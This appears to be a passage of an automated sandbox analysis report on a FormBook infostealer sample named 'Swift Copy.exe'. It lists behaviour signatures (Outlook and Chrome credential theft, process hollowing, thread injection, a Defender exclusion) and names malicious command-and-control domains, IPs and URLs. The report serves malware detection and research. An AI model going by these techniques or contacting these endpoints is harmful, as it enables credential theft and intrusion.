Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 682145 Sample: Swift Copy.exe Startdate: 11/08/2022 Architecture: WINDOWS Score: 100 39 www.posinet1.com 2->39 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 8 other signatures 2->53 9 Swift Copy.exe 7 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\ImUIYlbLTIh.exe, PE32 9->33 dropped 35 C:\Users\user\AppData\Local\...\tmpE16E.tmp, XML 9->35 dropped 37 C:\Users\user\AppData\...\Swift Copy.exe.log, ASCII 9->37 dropped 61 Writes to foreign memory regions 9->61 63 Adds a directory exclusion to Windows Defender 9->63 65 Injects a PE file into a foreign processes 9->65 13 RegSvcs.exe 9->13         started        16 powershell.exe 19 9->16         started        18 schtasks.exe 1 9->18         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 13->75 77 Maps a DLL or memory area into another process 13->77 79 Sample uses process hollowing technique 13->79 81 Queues an APC in another process (thread injection) 13->81 20 explorer.exe 13->20 injected 24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 41 mogdento.com 103.92.235.55, 49825, 49828, 80 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN India 20->41 43 kinemartigues.com 51.159.175.169, 49819, 49821, 80 OnlineSASFR France 20->43 45 7 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 59 Uses netstat to query active network connections and open ports 20->59 28 NETSTAT.EXE 13 20->28         started        31 autofmt.exe 20->31         started        signatures11 process12 signatures13 67 Tries to steal Mail credentials (via file / registry access) 28->67 69 Tries to harvest and steal browser information (history, passwords, etc) 28->69 71 Modifies the context of a thread in another process (thread injection) 28->71 73 Maps a DLL or memory area into another process 28->73
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.92.235.55
 mogdento.com India
138251 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN true
103.67.235.120
 www.epic45.co.uk Philippines
38719 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU true
192.3.130.2
 www.expectedclosure.one United States
36352 AS-COLOCROSSINGUS true
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR true
51.159.175.169
 kinemartigues.com France
12876 OnlineSASFR true

Contacted Domains

Name IP Active
www.epic45.co.uk 103.67.235.120 true
www.posinet1.com 202.172.26.50 true
kinemartigues.com 51.159.175.169 true
www.expectedclosure.one 192.3.130.2 true
mogdento.com 103.92.235.55 true
natroredirect.natrocdn.com 85.159.66.93 true
www.mogdento.com unknown unknown
www.kinemartigues.com unknown unknown
www.blackyaga.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 true
  • Avira URL Cloud: malware
 unknown
http://www.kinemartigues.com/bwe0/ true
  • Avira URL Cloud: malware
 unknown
http://www.epic45.co.uk/bwe0/ true
  • Avira URL Cloud: malware
 unknown
www.my1245.com/bwe0/ true
  • Avira URL Cloud: malware
 low
http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== true
  • Avira URL Cloud: malware
 unknown
http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== true
  • Avira URL Cloud: malware
 unknown
http://www.mogdento.com/bwe0/ true
  • Avira URL Cloud: malware
 unknown
http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== true
  • Avira URL Cloud: malware
 unknown